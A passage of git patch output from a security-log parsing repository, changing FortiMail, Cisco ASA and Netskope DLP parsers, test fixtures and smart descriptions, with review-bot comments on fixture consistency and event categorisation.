+ "properties": { + "delay": "00:00:01", + "device_id": "FFFF", + "dsn_version": "2.0.0", + "log_id": "YY", + "mailer": "esmtp", + "priority_level_msg": "2290731", + "relay": "1.2.3.4", + "session_id": "AAA-BBB", + "user_identifier": "mail", + "xdelay": "00:00:01" + } + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "email": { + "to": { + "address": [ + "johndoe" + ] + } + }, + "log": { + "hostname": "abc", + "level": "information" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "mail" + ] + }, + "user": { + "email": "johndoe", + "name": "mail" + } + } +} \ No newline at end of file 
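Review bot: The expected output pins `email.to.address` as `["johndoe"]` and `user.email` as `"johndoe"`, yet `johndoe` does not occur anywhere in the input message (`to=` is empty and the only user is `user=mail`), so this fixture cannot be the parser's output for this input unless the values were anonymized after generation or the runner ignores those keys. The same holds for `john.doe@example.com` in short_event.json and `jdoe@example.com` in esmtp.json in this commit. A fixture whose input and expectation do not round-trip gives no regression coverage for the relay change it was added for; regenerate it from the anonymized input, or anonymize both sides consistently.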
diff --git a/Fortinet/fortimail/tests/short_event.json b/Fortinet/fortimail/tests/short_event.json new file mode 100644 index 000000000..c44f8b41d --- /dev/null +++ b/Fortinet/fortimail/tests/short_event.json @@ -0,0 +1,51 @@ +{ + "input": { + "message": "to=, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)", + "event": { + "created": "2021-04-23T20:02:05.017771Z", + "id": "123" + }, + "log": { + "hostname": "abc" + } + }, + "expected": { + "message": "to=, delay=00:00:00, xdelay=00:00:00, mailer=esmtp, pri=138084, relay=[1.2.3.4] [1.2.3.4], dsn=2.0.0, stat=Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)", + "event": { + "reason": "Sent ( [InternalId=123456789, Hostname=example] 20226 bytes in 0.127, 154,320 KB/sec Queued mail for delivery)" + }, + "action": { + "properties": { + "delay": "00:00:00", + "dsn_version": "2.0.0", + "mailer": "esmtp", + "priority_level_msg": "138084", + "relay": "1.2.3.4", + "xdelay": "00:00:00" + } + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "email": { + "to": { + "address": [ + "john.doe@example.com," + ] + } + }, + "log": { + "hostname": "abc", + "level": "138084," + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json index 1c89334d7..9a2659f4d 100644 --- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json +++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_client_local_certificate.json 
@@ -28,9 +28,6 @@ "user_identifier": "mail" } }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json index 0da4d56d5..70415b73c 100644 --- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json +++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_local_certificate.json @@ -28,9 +28,6 @@ "user_identifier": "mail" } }, - "host": { - "name": "ABC" - }, "log": { "hostname": "ABC", "level": "information" diff --git a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json index 9f137120f..ea4d6f21f 100644 --- a/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json +++ b/Fortinet/fortimail/tests/smtp_event_STARTTLS_server_signed_certificate.json @@ -28,9 +28,6 @@ "user_identifier": "mail" } }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" diff --git a/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json b/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json index b338e25d9..a097c6a8f 100644 --- a/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json +++ b/Fortinet/fortimail/tests/smtp_event_to_user_unknown.json @@ -38,9 +38,6 @@ ] } }, - "host": { - "name": "00000" - }, "log": { "hostname": "00000", "level": "information" diff --git a/Fortinet/fortimail/tests/spam.json b/Fortinet/fortimail/tests/spam.json index 9fa8fb568..74f0940df 100644 --- a/Fortinet/fortimail/tests/spam.json +++ b/Fortinet/fortimail/tests/spam.json @@ -41,9 +41,6 @@ "name": "icon_deleteall.png", "type": "file" }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" 
diff --git a/Fortinet/fortimail/tests/spam_antispam_url.json b/Fortinet/fortimail/tests/spam_antispam_url.json index 635e3d904..341f0de9d 100644 --- a/Fortinet/fortimail/tests/spam_antispam_url.json +++ b/Fortinet/fortimail/tests/spam_antispam_url.json @@ -41,9 +41,6 @@ ] } }, - "host": { - "name": "abc" - }, "log": { "hostname": "abc", "level": "information" diff --git a/Fortinet/fortimail/tests/spam_antivirus.json b/Fortinet/fortimail/tests/spam_antivirus.json index 0506c70c8..288c1147a 100644 --- a/Fortinet/fortimail/tests/spam_antivirus.json +++ b/Fortinet/fortimail/tests/spam_antivirus.json @@ -49,9 +49,6 @@ "name": "file.ppt", "type": "file" }, - "host": { - "name": "abc" - }, "log": { "hostname": "abc", "level": "information" diff --git a/Fortinet/fortimail/tests/spam_webfilter_url.json b/Fortinet/fortimail/tests/spam_webfilter_url.json index ebb7f0266..2eb7a2eee 100644 --- a/Fortinet/fortimail/tests/spam_webfilter_url.json +++ b/Fortinet/fortimail/tests/spam_webfilter_url.json @@ -43,9 +43,6 @@ ] } }, - "host": { - "name": "12345" - }, "log": { "hostname": "12345", "level": "information" diff --git a/Fortinet/fortimail/tests/spam_webfilter_url_1.json b/Fortinet/fortimail/tests/spam_webfilter_url_1.json index fda23bcf5..8a5e42a58 100644 --- a/Fortinet/fortimail/tests/spam_webfilter_url_1.json +++ b/Fortinet/fortimail/tests/spam_webfilter_url_1.json @@ -41,9 +41,6 @@ ] } }, - "host": { - "name": "12345" - }, "log": { "hostname": "12345", "level": "information" diff --git a/Fortinet/fortimail/tests/statistics.json b/Fortinet/fortimail/tests/statistics.json index 0b4060b2c..facd562a8 100644 --- a/Fortinet/fortimail/tests/statistics.json +++ b/Fortinet/fortimail/tests/statistics.json @@ -46,9 +46,6 @@ ] } }, - "host": { - "name": "B96f1GJTxDUKbh2l" - }, "http": { "request": { "bytes": 112389 diff --git a/Fortinet/fortimail/tests/virus.json b/Fortinet/fortimail/tests/virus.json index fd3309163..dcfb05fca 100644 --- a/Fortinet/fortimail/tests/virus.json 
+++ b/Fortinet/fortimail/tests/virus.json @@ -32,9 +32,6 @@ "name": "file.pdf", "type": "file" }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" diff --git a/Fortinet/fortimail/tests/virus_1.json b/Fortinet/fortimail/tests/virus_1.json index ebd2ef853..2d26abe84 100644 --- a/Fortinet/fortimail/tests/virus_1.json +++ b/Fortinet/fortimail/tests/virus_1.json @@ -24,9 +24,6 @@ "session_id": "15N7xWCW025167-15N7xWCX025167" } }, - "host": { - "name": "hostname" - }, "log": { "hostname": "hostname", "level": "information" From d5a9a59e903511c7038780b925c5d0c1c47425d5 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Thu, 12 Sep 2024 09:57:15 +0300 Subject: [PATCH 012/317] Fix: Cisco secure firewall new events --- Cisco/cisco-secure-firewall/ingest/parser.yml | 22 +++++++++- .../tests/test_ASA_111008.json | 30 ++++++++++++++ .../tests/test_ASA_113012.json | 33 +++++++++++++++ .../tests/test_ASA_611101.json | 41 +++++++++++++++++++ .../tests/test_ASA_611103.json | 34 +++++++++++++++ 5 files changed, 158 insertions(+), 2 deletions(-) create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_111008.json create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_113012.json create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_611101.json create mode 100644 Cisco/cisco-secure-firewall/tests/test_ASA_611103.json diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index f47e3a550..a89263732 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -58,6 +58,8 @@ pipeline: "110002": "%{CISCO_110002}" "110003": "%{CISCO_110003}" "111007": "%{CISCO_111007}" + "111008": "%{CISCO_111008}" + "113012": "%{CISCO_113012}" "113004": "%{CISCO_113004}" "199019": "%{CISCO_199019}" "302013": "%{CISCO_302013_302014_302015_302016}" 
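Review bot: `"113012"` is inserted before `"113004"`, breaking the ascending numeric order the rest of this map follows (the `611101`/`611103` entries in the next hunk are placed correctly); move the line below `"113004": "%{CISCO_113004}"`. The same id list is repeated in the `set_ecs_fields` filter further down, so every new message id has to be added in three places; a comment at the top of the map, e.g. `# keep in sync with the set_ecs_fields filter below`, would help the next maintainer.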
@@ -82,6 +84,8 @@ pipeline:
 "602304": "%{CISCO_602303_602304}"
 "609001": "%{CISCO_609001_609002}"
 "609002": "%{CISCO_609001_609002}"
+ "611101": "%{CISCO_611101}"
+ "611103": "%{CISCO_611103}"
 "710001": "%{CISCO_710001_710002_710003_710005_710006}"
 "710002": "%{CISCO_710001_710002_710003_710005_710006}"
 "710003": "%{CISCO_710001_710002_710003_710005_710006}"
@@ -119,7 +123,9 @@ pipeline:
 CISCO_110002: "%{CISCO_REASON:action_name} for %{DATA:network_transport} from %{DATA:source_address}:%{IP:source_ip}/%{INT:source_port} to %{IP:destination_ip}/%{INT:destination_port}"
 CISCO_110003: '%{GREEDYDATA:action_name} from %{WORD}\:%{IP:source_ip}\/([1-2]?[0-9]|3[0-2]) to %{WORD}\:%{IP:destination_ip}\/([1-2]?[0-9]|3[0-2])(, %{GREEDYDATA:action_outcome_reason})?'
 CISCO_111007: '%{GREEDYDATA:action_name}: %{IP:source_ip} reading from %{NOTSPACE:network_transport} \[%{DATA:http_method}\]'
+ CISCO_111008: "User '%{DATA:user_name}' executed the '%{GREEDYDATA:action_name}' command"
 CISCO_113004: "%{GREEDYDATA} user authentication %{WORD} : server = (\\s*)?%{IP:destination_ip} : user = %{DATA:user_name}"
+ CISCO_113012: "%{GREEDYDATA} user authentication %{WORD} : local database : user = %{DATA:user_name}"
 CISCO_199019: '%{GREEDYDATA} %{DURATION} %{WORD:process_name}\[%{GREEDYDATA:process_id}\]: %{WORD:log_host} %{GREEDYDATA:result}'
 CISCO_302013_302014_302015_302016: '%{CISCO_ACTION:action_name}(?: %{CISCO_DIRECTION:network_direction})? %{DATA:network_transport} connection %{INT} for %{DATA:source_address}:%{IP:source_ip}/%{INT:source_port}( \(%{IP:source_nat_ip}/%{INT:source_nat_port}\))?(\(%{DATA}\))? to %{DATA:destination_address}:%{IP:destination_ip}/%{INT:destination_port}( \(%{IP:destination_nat_ip}/%{INT:destination_nat_port}\))?(\(%{DATA}\))?( duration %{DATA:network_duration} bytes %{INT:network_bytes})?%{DATA}( \(%{DATA:user_name}\))?'
 CISCO_302020_302021: '%{CISCO_ACTION:action_name}(?: %{CISCO_DIRECTION:network_direction})? %{DATA:network_transport} connection for faddr %{IP:source_ip}/%{INT:source_port}(\(%{DATA:user_group}\\%{DATA}\))? gaddr %{IP}/%{INT} laddr %{IP:destination_ip}/%{INT:destination_port}( \(%{DATA:user_name}\))?( type %{INT:icmp_type} code %{INT:icmp_code})?%{DATA}'
@@ -136,6 +142,8 @@ pipeline:
 CISCO_500004: "%{CISCO_REASON:action_name} for protocol=%{DATA:network_transport}, from %{IP:source_ip}/%{INT:source_port} to %{IP:destination_ip}/%{INT:destination_port}"
 CISCO_602303_602304: '%{DATA:network_transport}: An %{CISCO_DIRECTION:network_direction} %{GREEDYDATA} SA \(SPI= %{DATA}\) between %{IP:source_ip} and %{IP:destination_ip} \(user= %{DATA:user_name}\) has been %{CISCO_ACTION:action_name}'
 CISCO_609001_609002: "%{CISCO_ACTION:action_name} local-host (%{DATA:src_interface_name})?:%{IP:source_ip}( duration %{DURATION:event_duration})?"
+ CISCO_611101: "User authentication %{DATA:action_name}: IP address: %{IP:source_ip}, Uname: %{DATA:user_name}"
+ CISCO_611103: "User %{DATA:action_name}: Uname: %{DATA:user_name}"
 CISCO_710001_710002_710003_710005_710006: "%{DATA:network_transport} (?:request|access) %{CISCO_ACTION:action_name} from %{IP:source_ip}/%{INT:source_port} to %{DATA:destination_address}:%{IP:destination_ip}/%{INT:destination_port}"
 CISCO_713172: 'Group = %{GREEDYDATA}, IP = %{IP:source_ip}, Automatic NAT Detection Status:\s+Remote end\s*%{DATA:is_remote_natted}\s*behind a NAT device\s+This\s+end\s*%{DATA}\s*behind a NAT device'
 CISCO_716058: Group <%{GREEDYDATA:user_group}> User <%{WORD:user_name}> IP <%{IP:source_ip}> %{GREEDYDATA:action_name}\. Waiting to resume.
@@ -168,7 +176,7 @@ pipeline: - name: set_common_fields - name: set_ecs_fields - filter: '{{pre_parsing.pre_message.message_number_grok in ["106001","110003", "106006", "106007", "106010", "106012", "106014", "106015", "106021", "106023", "106100", "110002", "111007", "113004", "199019", "302013", "302014", "302015", "302016", "302020", "302021", "304001", "305011", "313001", "313004", "313005", "313008", "305012", "402117", "402119", "419001", "419002", "500004", "602303", "602304", "609001", "609002", "710001", "710002", "710003", "710005", "710006", "716058", "713172", "716059", "722011", "722012", "722022", "722023", "722028", "722032", "722033", "722034", "722037", "725001", "733100", "725002", "725003", "725006", "725007", "737016", "852001"]}}' + filter: '{{pre_parsing.pre_message.message_number_grok in ["106001","110003", "106006", "106007", "106010", "106012", "106014", "106015", "106021", "106023", "106100", "110002", "111007", "111008", "113004", "113012", "199019", "302013", "302014", "302015", "302016", "302020", "302021", "304001", "305011", "313001", "313004", "313005", "313008", "305012", "402117", "402119", "419001", "419002", "500004", "602303", "602304", "609001", "609002", "611101", "611103", "710001", "710002", "710003", "710005", "710006", "716058", "713172", "716059", "722011", "722012", "722022", "722023", "722028", "722032", "722033", "722034", "722037", "725001", "733100", "725002", "725003", "725006", "725007", "737016", "852001"]}}' - name: set_ecs_fields_from_kv filter: '{{pre_parsing.pre_message.message_number_grok in ["430001","430002","430003","430004","430005"]}}' - name: set_ecs_fields_from_condition 
@@ -389,7 +397,17 @@ stages: event.category: ["authentication"] event.type: ["start"] event.outcome: "success" - filter: '{{pre_parsing.pre_message.message_number_grok == "113004"}}' + filter: '{{pre_parsing.pre_message.message_number_grok in ["113004", "113012"]}}' + - set: + event.category: [ "authentication" ] + event.type: [ "info" ] + event.outcome: "success" + filter: '{{pre_parsing.pre_message.message_number_grok in ["611101"]}}' + - set: + event.category: [ "authentication" ] + event.type: [ "end" ] + event.outcome: "success" + filter: '{{pre_parsing.pre_message.message_number_grok in ["611103"]}}' - set: network.transport: "{{parsed_event.message.network_transport|lower }}" filter: '{{parsed_event.message.get("network_transport") != None}}' diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json b/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json new file mode 100644 index 000000000..8e823017c --- /dev/null +++ b/Cisco/cisco-secure-firewall/tests/test_ASA_111008.json @@ -0,0 +1,30 @@ +{ + "input": { + "message": "%ASA-5-111008: User 'admintufin' executed the 'login' command" + }, + "expected": { + "message": "%ASA-5-111008: User 'admintufin' executed the 'login' command", + "event": { + "category": [ + "network" + ], + "code": "111008" + }, + "action": { + "name": "login", + "target": "network-traffic" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "user": [ + "admintufin" + ] + }, + "user": { + "name": "admintufin" + } + } +} \ No newline at end of file diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json b/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json new file mode 100644 index 000000000..89a45ce75 --- /dev/null +++ b/Cisco/cisco-secure-firewall/tests/test_ASA_113012.json 
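Review bot: No category/type stage is added for 111008, so per the new test_ASA_111008.json fixture an administrator executing a command is emitted with `event.category: ["network"]` and `action.target: "network-traffic"` — presumably the pack's default from a stage outside this hunk — which hides these events from rules keyed on configuration or process activity. Add a stage next to the new 611101/611103 ones, e.g. `event.category: ["configuration"]` and `event.type: ["change"]` (or `process`/`start` if that is the pack's convention) with `filter: '{{pre_parsing.pre_message.message_number_grok == "111008"}}'`, and keep the `network-traffic` target off it. The `in ["611101"]` / `in ["611103"]` single-element lists could be `==` comparisons like the 113004 filter was before this change.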
@@ -0,0 +1,33 @@ +{ + "input": { + "message": "%ASA-6-113012: AAA user authentication Successful : local database : user = admintufin" + }, + "expected": { + "message": "%ASA-6-113012: AAA user authentication Successful : local database : user = admintufin", + "event": { + "category": [ + "authentication" + ], + "code": "113012", + "outcome": "success", + "type": [ + "start" + ] + }, + "action": { + "target": "network-traffic" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "user": [ + "admintufin" + ] + }, + "user": { + "name": "admintufin" + } + } +} \ No newline at end of file diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json b/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json new file mode 100644 index 000000000..e7a7eae6f --- /dev/null +++ b/Cisco/cisco-secure-firewall/tests/test_ASA_611101.json @@ -0,0 +1,41 @@ +{ + "input": { + "message": "%ASA-6-611101: User authentication succeeded: IP address: 0.0.0.0, Uname: admintufin" + }, + "expected": { + "message": "%ASA-6-611101: User authentication succeeded: IP address: 0.0.0.0, Uname: admintufin", + "event": { + "category": [ + "authentication" + ], + "code": "611101", + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "succeeded", + "target": "network-traffic" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "0.0.0.0" + ], + "user": [ + "admintufin" + ] + }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, + "user": { + "name": "admintufin" + } + } +} \ No newline at end of file diff --git a/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json b/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json new file mode 100644 index 000000000..6e39d0856 --- /dev/null +++ b/Cisco/cisco-secure-firewall/tests/test_ASA_611103.json 
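Review bot: test_ASA_611101.json pins `source.ip` and `related.ip` as `0.0.0.0`: the `CISCO_611101` pattern copies whatever follows `IP address:` straight into `source.ip`, and the unspecified address (which the appliance appears to emit for local or console sessions — not verifiable from this page) then pollutes `related.ip` pivots and any source-based correlation. Guard the assignment for this id so `0.0.0.0` is not promoted, e.g. extend the filter of the stage that sets `source.ip` (outside this hunk) with `and parsed_event.message.get("source_ip") != "0.0.0.0"`, and update the fixture to expect no `source` and no `related.ip` for this sample.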
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "%ASA-5-611103: User logged out: Uname: admintufin" + }, + "expected": { + "message": "%ASA-5-611103: User logged out: Uname: admintufin", + "event": { + "category": [ + "authentication" + ], + "code": "611103", + "outcome": "success", + "type": [ + "end" + ] + }, + "action": { + "name": "logged out", + "target": "network-traffic" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "user": [ + "admintufin" + ] + }, + "user": { + "name": "admintufin" + } + } +} \ No newline at end of file From 5a53c623a6c3bdfd95535a83657a18887d1887e1 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Thu, 12 Sep 2024 09:59:00 +0300 Subject: [PATCH 013/317] apply linter --- Cisco/cisco-secure-firewall/ingest/parser.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index a89263732..04ce99510 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -399,13 +399,13 @@ stages: event.outcome: "success" filter: '{{pre_parsing.pre_message.message_number_grok in ["113004", "113012"]}}' - set: - event.category: [ "authentication" ] - event.type: [ "info" ] + event.category: ["authentication"] + event.type: ["info"] event.outcome: "success" filter: '{{pre_parsing.pre_message.message_number_grok in ["611101"]}}' - set: - event.category: [ "authentication" ] - event.type: [ "end" ] + event.category: ["authentication"] + event.type: ["end"] event.outcome: "success" filter: '{{pre_parsing.pre_message.message_number_grok in ["611103"]}}' - set: From 81a9ef4b5f12c05ea0d9911fe690a0dec9c51d65 Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Thu, 12 Sep 2024 10:06:08 +0300 Subject: [PATCH 014/317] Add smart description --- .../_meta/smart-descriptions.json | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) 
diff --git a/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json b/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
index d8089521b..8682bb293 100644
--- a/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
+++ b/Cisco/cisco-secure-firewall/_meta/smart-descriptions.json
@@ -172,6 +172,53 @@
 }
 ]
 },
+ {
+ "value": "User {user.name} logged out",
+ "conditions": [
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "event.category",
+ "value": "authentication"
+ },
+ {
+ "field": "event.type",
+ "value": "end"
+ }
+ ]
+ },
+ {
+ "value": "User {user.name} logged in",
+ "conditions": [
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "event.category",
+ "value": "authentication"
+ },
+ {
+ "field": "event.type",
+ "value": "start"
+ }
+ ]
+ },
+ {
+ "value": "User {user.name} authentication: {action.name}",
+ "conditions": [
+ {
+ "field": "user.name"
+ },
+ {
+ "field": "action.name"
+ },
+ {
+ "field": "event.category",
+ "value": "authentication"
+ }
+ ]
+ },
 {
 "value": "User {user.name}: {event.reason}",
 "conditions": [
From 299f49c60a6a34903e428554ffdf731fed218c41 Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Thu, 12 Sep 2024 17:37:45 +0200
Subject: [PATCH 015/317] Fix on Netskope: Addition of dlp fields
---
 Netskope/netskope_events/_meta/fields.yml | 25 +++++++++++++++++++
 Netskope/netskope_events/ingest/parser.yml | 22 ++++++++++++++++
 .../tests/test_dlp_incident.json | 19 +++++++++++++-
 3 files changed, 65 insertions(+), 1 deletion(-)
diff --git a/Netskope/netskope_events/_meta/fields.yml b/Netskope/netskope_events/_meta/fields.yml
index 57217bd9f..18c1fab3f 100644
--- a/Netskope/netskope_events/_meta/fields.yml
+++ b/Netskope/netskope_events/_meta/fields.yml
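Review bot: The third new entry, `"User {user.name} authentication: {action.name}"`, has no `event.type` condition, so it also matches the logout and login events that the first two entries target whenever `action.name` is populated — the 611103 fixture in this series has `action.name: "logged out"` together with `event.type: end`. Which description wins then depends on evaluation order, which I infer is first-match but cannot see here. To make the three entries disjoint, add `{ "field": "event.type", "value": "info" }` to the third entry's conditions, mirroring the `end` and `start` conditions of the other two.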
@@ -8,6 +8,16 @@ netskope.alerts.type: name: netskope.alerts.type type: keyword +netskope.dlp.action: + description: The action done on the DLP incident + name: netskope.dlp.action + type: keyword + +netskope.dlp.forensic_id: + description: The identifier of the forensic + name: netskope.dlp.forensic_id + type: keyword + netskope.dlp.incident.id: description: The identifier of the DLP incident name: netskope.dlp.incident.id @@ -18,6 +28,21 @@ netskope.dlp.incident.parent_id: name: netskope.dlp.incident.parent_id type: keyword +netskope.dlp.policy: + description: The policy that triggered the DLP incident + name: netskope.dlp.policy + type: keyword + +netskope.dlp.profile_name: + description: The name of the DLP profile + name: netskope.dlp.profile_name + type: keyword + +netskope.dlp.rules: + description: Rules that triggered the DLP incident + name: netskope.dlp.rules + type: array + netskope.events.access_method: description: The action done on the application name: netskope.events.access_method diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index d966ed9c5..471b39627 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml 
@@ -141,6 +141,28 @@ stages: netskope.events.ccl: "{{parsed_event.message.ccl}}" netskope.events.severity.id: "{{parsed_event.message.severity_id}}" netskope.events.severity.level: "{{parsed_event.message.severity_level}}" + - set: + netskope.dlp.action: "{{parsed_event.message.dlp_match_info[0].dlp_action}}" + netskope.dlp.forensic_id: "{{parsed_event.message.dlp_match_info[0].dlp_forensic_id}}" + netskope.dlp.policy: "{{parsed_event.message.dlp_match_info[0].dlp_policy}}" + netskope.dlp.profile_name: "{{parsed_event.message.dlp_match_info[0].dlp_profile_name}}" + filter: "{{parsed_event.message.dlp_match_info[0] != None}}" + + - set: + netskope.dlp.rules: > + {%- set rules = [] -%} + {%- for rule in parsed_event.message.dlp_match_info[0].dlp_rules -%} + {%- set _ = rules.append({ + "name": rule.dlp_rule_name, + "score": rule.dlp_rule_score, + "severity": rule.dlp_rule_severity, + "count": rule.dlp_incident_rule_count, + "unique_count": rule.is_unique_count, + "data_identifiers": rule.dlp_data_identifiers + }) -%} + {%- endfor -%} + {{rules}} + filter: "{{parsed_event.message.dlp_match_info[0] != None and parsed_event.message.dlp_match_info[0].dlp_rules != None}}" - set: netskope.dlp.incident.id: "{{parsed_event.message.dlp_incident_id}}" filter: "{{parsed_event.message.dlp_incident_id not in [None, 0]}}" diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 103d1cb37..66c901c90 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json 
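Review bot: Both new stages subscript `parsed_event.message.dlp_match_info[0]` inside their `filter`, so an event with no `dlp_match_info` key, or an empty list, is protected only by how the template engine treats an undefined or out-of-range index; the neighbouring stages use `.get(...)` for optional keys, which suggests that behaviour is not relied on elsewhere in this parser. I would guard explicitly, e.g. `filter: "{{(parsed_event.message.get('dlp_match_info') or []) | length > 0}}"` and, for the rules stage, `... and parsed_event.message.dlp_match_info[0].get('dlp_rules') != None`. Separately, only the first element is mapped although the source key is plural; if a Netskope incident can carry several match infos, a comment stating that only the first is kept, or a loop like the one already used for `dlp_rules`, would make the loss explicit. The `stages` list continues outside this hunk.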
@@ -39,9 +39,26 @@ }, "netskope": { "dlp": { + "action": "useralert", + "forensic_id": "2222222222222222222", "incident": { "id": "2222222222222222222" - } + }, + "policy": "[DLP] Block sensitive files on Cloud Storage", + "profile_name": "DLP-PII", + "rules": [ + { + "count": 5, + "data_identifiers": { + "industries/healthcare/medical_conditions/eng": 5, + "persons/proper_names/us/last": 5 + }, + "name": "Name-Medical Condition", + "score": 10, + "severity": "Low", + "unique_count": false + } + ] }, "events": { "access_method": "Client", From f53590fa1925f5ee6a9270e32df5a7fc1eec34e6 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 12 Sep 2024 17:43:05 +0200 Subject: [PATCH 016/317] Added generic smartdesc for dlp events --- .../netskope_events/_meta/smart-descriptions.json | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/Netskope/netskope_events/_meta/smart-descriptions.json b/Netskope/netskope_events/_meta/smart-descriptions.json index 14c92d9e3..bdc92b317 100644 --- a/Netskope/netskope_events/_meta/smart-descriptions.json +++ b/Netskope/netskope_events/_meta/smart-descriptions.json @@ -202,5 +202,17 @@ "type": "connected to" } ] + }, + { + "value": "DLP incident detected: {netskope.dlp.policy}", + "conditions": [ + { + "field": "event.dataset", + "value": "dlp_incident" + }, + { + "field": "netskope.dlp.policy" + } + ] } ] From 383ccab5663c7d08e47ae94ba61123023f8f4e5c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Fri, 13 Sep 2024 12:38:21 +0300 Subject: [PATCH 017/317] Remove short message parsing --- Fortinet/fortimail/ingest/parser.yml | 26 ------------ Fortinet/fortimail/tests/short_event.json | 51 ----------------------- 2 files changed, 77 deletions(-) delete mode 100644 Fortinet/fortimail/tests/short_event.json diff --git a/Fortinet/fortimail/ingest/parser.yml b/Fortinet/fortimail/ingest/parser.yml index 09a3fbb8b..f57bd8dcd 100644 --- a/Fortinet/fortimail/ingest/parser.yml +++ b/Fortinet/fortimail/ingest/parser.yml 
@@ -7,17 +7,6 @@ pipeline: properties: input_field: "{{original.message}}" - - name: parse_short_event - external: - name: grok.match - properties: - input_field: original.message - output_field: msg - pattern: "to=%{DATA:email_to}%{DELIM}(delay=%{DATA:tmp_delay}%{DELIM})?(xdelay=%{DATA:tmp_xdelay}%{DELIM})?(mailer=%{DATA:tmp_mailer}%{DELIM})?(pri=%{NUMBER:tmp_priority_level_msg}%{DELIM})?(relay=%{RELAY_INFO:relay}%{DELIM})?(dsn=%{DATA:tmp_dsn_version}%{DELIM})?stat=%{GREEDYDATA:event_reason}" - custom_patterns: - DELIM: ', |\s' - RELAY_INFO: '(%{HOSTNAME:destination_domain}? \[%{IP:_destination_ip}\])|(\[%{IP:_destination_ip}\] \[%{IP:_destination_ip2}\])' - - name: parsed_msg external: name: grok.match 
